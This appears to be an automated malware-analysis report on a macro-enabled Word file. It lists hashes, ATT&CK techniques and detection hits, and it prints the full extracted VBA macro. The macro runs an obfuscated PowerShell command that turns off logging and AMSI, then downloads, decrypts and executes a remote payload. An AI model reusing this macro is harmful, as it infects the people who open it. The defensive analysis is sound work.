Office (OOXML) malware analysis — malicious · ea659a87bcbe80b5

MALICIOUS

Office (OOXML)

254.1 KB Created: 2021-06-21 12:33:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2021-06-30

MD5: f123a68eea92b34d76f0ca0b677419bd SHA-1: 986a2c9dfdf9197271a6d452a966ee6ad0f52e2b SHA-256: ea659a87bcbe80b55637d655ddf177a07f2f817567a23bafab8de63d3e0ad635

230 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that execute an AutoClose function. This function constructs and executes a PowerShell command. The PowerShell command appears to be heavily obfuscated but is designed to download and execute a second-stage payload. The use of WScript.Shell and CreateObject further indicates malicious intent.

Heuristics 7

VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

        Kk = Kk + "ACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA="
        Set asd = CreateObject("WScript.Shell")
        asd.Run (Kk)

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

        Dim Kk As String
        Kk = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
        Kk = Kk + "BFAHIAcwBpAG8AbgBUAEEAQgBsAGUALgBQAFMAVgBlAHIAUwBp"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

        Kk = Kk + "ACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA="
        Set asd = CreateObject("WScript.Shell")
        asd.Run (Kk)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Attribute VB_Customizable = True
Sub AutoClose()
        m
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	8179 bytes
SHA-256: `b6985c08093ba8ee36ad0749e5992733f24cb24643c7b50c38961e7ded69d0af`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub AutoClose() m End Sub Public Function m() As Variant Dim Kk As String Kk = "powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg" Kk = Kk + "BFAHIAcwBpAG8AbgBUAEEAQgBsAGUALgBQAFMAVgBlAHIAUwBp" Kk = Kk + "AG8AbgAuAE0AQQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABiAG" Kk = Kk + "UAMgBlADMAPQBbAFIARQBGAF0ALgBBAHMAcwBlAG0AQgBsAFkA" Kk = Kk + "LgBHAEUAdABUAHkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQ" Kk = Kk + "BuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBu" Kk = Kk + "AC4AVQB0AGkAbABzACcAKQAuACIARwBlAFQARgBJAGUAYABsAG" Kk = Kk + "QAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkA" Kk = Kk + "YwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8Abg" Kk = Kk + "BQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkARgAo" Kk = Kk + "ACQAYgBlADIARQAzACkAewAkADgARgBhADEAQgA9ACQAQgBFAD" Kk = Kk + "IARQAzAC4ARwBFAHQAVgBhAEwAVQBFACgAJABOAHUATABMACkA" Kk = Kk + "OwBJAGYAKAAkADgAZgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQg" Kk = Kk + "AnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAk" Kk = Kk + "ADgARgBBADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG" Kk = Kk + "8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwA" Kk = Kk + "ZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZw" Kk = Kk + "BpAG4AZwAnAF0APQAwADsAJAA4AGYAQQAxAGIAWwAnAFMAYwBy" Kk = Kk + "AGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnAC" Kk = Kk + "cAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8A" Kk = Kk + "YwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZw" Kk = Kk + "AnAF0APQAwAH0AJABWAEEAbAA9AFsAQwBPAGwAbABlAEMAVABJ" Kk = Kk + "AE8ATgBzAC4ARwBFAG4AZQBSAEkAYwAuAEQAaQBDAHQAaQBvAG" Kk = Kk + "4AYQByAHkAWwBzAFQAUgBpAG4AZwAsAFMAWQBTAFQAZQBtAC4A" Kk = Kk + "TwBiAGoARQBDAFQAXQBdADoAOgBuAEUAdwAoACkAOwAkAHYAYQ" Kk = Kk + "BMAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0" Kk = Kk + "AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwAC" Kk = Kk + "kAOwAkAHYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMA" Kk = Kk + "YwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbw" Kk = Kk + "BuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBC" Kk = Kk + "AFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE" Kk = Kk + "4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUA" Kk = Kk + "cwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcw" Kk = Kk + "BcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABC" Kk = Kk + "ACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAH" Kk = Kk + "YAQQBMAH0ARQBsAFMAZQB7AFsAUwBDAFIAaQBwAFQAQgBMAG8A" Kk = Kk + "YwBLAF0ALgAiAEcARQBUAEYASQBFAGAATABkACIAKAAnAHMAaQ" Kk = Kk + "BnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1" Kk = Kk + "AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAG" Kk = Kk + "EAbABVAGUAKAAkAG4AdQBsAEwALAAoAE4AZQB3AC0ATwBiAEoA" Kk = Kk + "ZQBDAFQAIABDAG8ATABsAGUAYwBUAEkAbwBuAHMALgBHAEUATg" Kk = Kk + "BFAFIAaQBjAC4ASABhAFMAaABTAEUAdABbAFMAVABSAGkAbgBn" Kk = Kk + "AF0AKQApAH0AJABSAEUARgA9AFsAUgBFAEYAXQAuAEEAUwBTAG" Kk = Kk + "UATQBiAEwAeQAuAEcARQBUAFQAeQBQAGUAKAAnAFMAeQBzAHQA" Kk = Kk + "ZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQ" Kk = Kk + "BhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAn" Kk = Kk + "ACkAOwAkAFIARQBmAC4ARwBlAFQARgBJAGUATABkACgAJwBhAG" Kk = Kk + "0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcA" Kk = Kk + "TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALg" Kk = Kk + "BTAGUAdABWAEEAbABVAGUAKAAkAE4AVQBMAGwALAAkAHQAUgB1" Kk = Kk + "AEUAKQA7AH0AOwBbAFMAWQBTAFQARQBNAC4ATgBlAHQALgBTAE" Kk = Kk + "UAUgB2AEkAYwBlAFAAbwBJAE4AVABNAGEAbgBhAEcAZQByAF0A" Kk = Kk + "OgA6AEUAeABQAEUAQwBUADEAMAAwAEMATwBuAFQASQBuAFUARQ" Kk = Kk + "A9ADAAOwAkAGUANgBjAGMANQA9AE4ARQB3AC0ATwBCAEoARQBD" Kk = Kk + "AFQAIABTAFkAcwB0AEUAbQAuAE4ARQB0AC4AVwBlAGIAQwBsAG" Kk = Kk + "kAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4A" Kk = Kk + "MAAgACgATABpAG4AdQB4ADsAIABBAG4AZAByAG8AaQBkACAAMQ" Kk = Kk + "AwADsAIABNAGkAIABOAG8AdABlACAAMQAwACAATABpAHQAZQAp" Kk = Kk + "ACAAQQBwAHAAbABlAFcAZQBiAEsAaQB0AC8ANQAzADcALgAzAD" Kk = Kk + "YAIAAoAEsASABUAE0ATAAsACAAbABpAGsAZQAgAEcAZQBjAGsA" Kk = Kk + "bwApACAAQwBoAHIAbwBtAGUALwA4ADkALgAwAC4ANAAzADgAOQ" Kk = Kk + "AuADEAMAA1ACAATQBvAGIAaQBsAGUAIABTAGEAZgBhAHIAaQAv" Kk = Kk + "ADUAMwA3AC4AMwA2ACcAOwAkAEUANgBjAEMANQAuAEgAZQBBAE" Kk = Kk + "QAZQByAHMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4A" Kk = Kk + "dAAnACwAJAB1ACkAOwAkAGUANgBjAGMANQAuAFAAUgBPAHgAeQ" Kk = Kk + "A9AFsAUwBZAFMAVABlAG0ALgBOAGUAVAAuAFcAZQBiAFIARQBR" Kk = Kk + "AFUAZQBzAHQAXQA6ADoARABlAEYAYQBVAGwAdABXAEUAYgBQAH" Kk = Kk + "IATwBYAFkAOwAkAGUANgBjAEMANQAuAFAAUgBPAHgAeQAuAEMA" Kk = Kk + "cgBFAGQAZQBOAHQASQBhAEwAUwAgAD0AIABbAFMAWQBzAFQAZQ" Kk = Kk + "BtAC4ATgBlAFQALgBDAHIAZQBEAGUAbgBUAGkAQQBMAEMAYQBD" Kk = Kk + "AEgARQBdADoAOgBEAGUARgBBAFUAbAB0AE4AZQBUAFcAbwBSAG" Kk = Kk + "sAQwBSAGUARABFAE4AdABpAEEATABTADsAJABTAGMAcgBpAHAA" Kk = Kk + "dAA6AFAAcgBvAHgAeQAgAD0AIAAkAGUANgBjAGMANQAuAFAAcg" Kk = Kk + "BvAHgAeQA7ACQASwA9AFsAUwB5AFMAdABlAG0ALgBUAEUAeABU" Kk = Kk + "AC4ARQBOAGMATwBkAEkAbgBHAF0AOgA6AEEAUwBDAEkASQAuAE" Kk = Kk + "cARQBUAEIAeQB0AGUAUwAoACcAVAA+AHcAagAtAEUAWAAhAHsA" Kk = Kk + "eQAxAFUAaQBWADoAUQBjAHYAdQBuAHIATQA5AHgAWwBfAFcARg" Kk = Kk + "BlACMAfgBLACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABB" Kk = Kk + "AHIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyAD" Kk = Kk + "UANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsA" Kk = Kk + "JABLAFsAJABfACUAJABLAC4AQwBPAFUAbgB0AF0AKQAlADIANQ" Kk = Kk + "A2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBb" Kk = Kk + "ACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAE" Kk = Kk + "kAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgA" Kk = Kk + "KwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQ" Kk = Kk + "AsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAk" Kk = Kk + "AEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAE" Kk = Kk + "kAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQA" Kk = Kk + "dAA9ACcARgBMAHQAVQBzAGIAUwAzAG8AcQBjAEEAQQBBAEEAQQ" Kk = Kk + "BBAEEAQQBBAEEAWgBfADgANgBCAEEASwBHAGsASwBQAE4ASABl" Kk = Kk + "AEIAUwBWADgARQBUAEQAYwBxAEYAagBsAEQAZwBhAGcAcgB2AG" Kk = Kk + "kAQwBFAHcAMABWAFYANgBFAGMAbgAnADsAJABFADYAYwBDADUA" Kk = Kk + "LgBIAGUAYQBkAEUAcgBTAC4AQQBEAEQAKAAiAEEAdQB0AGgAbw" Kk = Kk + "ByAGkAegBhAHQAaQBvAG4AIgAsACIAQgBlAGEAcgBlAHIAIAAk" Kk = Kk + "AHQAIgApADsAJABFADYAQwBjADUALgBIAGUAQQBEAGUAcgBTAC" Kk = Kk + "4AQQBEAGQAKAAiAEQAcgBvAHAAYgBvAHgALQBBAFAASQAtAEEA" Kk = Kk + "cgBnACIALAAnAHsAIgBwAGEAdABoACIAOgAiAC8ARQBuAGUAcg" Kk = Kk + "BnAHkALwBzAHQAYQBnAGkAbgBnAC8AZABlAGIAdQBnAHAAcwAi" Kk = Kk + "AH0AJwApADsAJABEAGEAdABhAD0AJABFADYAQwBDADUALgBEAG" Kk = Kk + "8AdwBuAGwAbwBBAEQARABhAFQAQQAoACcAaAB0AHQAcABzADoA" Kk = Kk + "LwAvAGMAbwBuAHQAZQBuAHQALgBkAHIAbwBwAGIAbwB4AGEAcA" Kk = Kk + "BpAC4AYwBvAG0ALwAyAC8AZgBpAGwAZQBzAC8AZABvAHcAbgBs" Kk = Kk + "AG8AYQBkACcAKQA7ACQASQB2AD0AJABEAGEAdABhAFsAMAAuAC" Kk = Kk + "4AMwBdADsAJABkAEEAdABBAD0AJABEAGEAVABhAFsANAAuAC4A" Kk = Kk + "JABEAGEAdABhAC4AbABlAE4ARwBUAGgAXQA7AC0ASgBvAGkAbg" Kk = Kk + "BbAEMAaABhAFIAWwBdAF0AKAAmACAAJABSACAAJABEAEEAdABB" Kk = Kk + "ACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=" Set asd = CreateObject("WScript.Shell") asd.Run (Kk) End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	19968 bytes
SHA-256: `20657c7da5149507db1c410432cacb916fb109616f74ade4d95caeb2d9dc5dc1`

Open this report in the interactive analyzer, or submit your own file for analysis.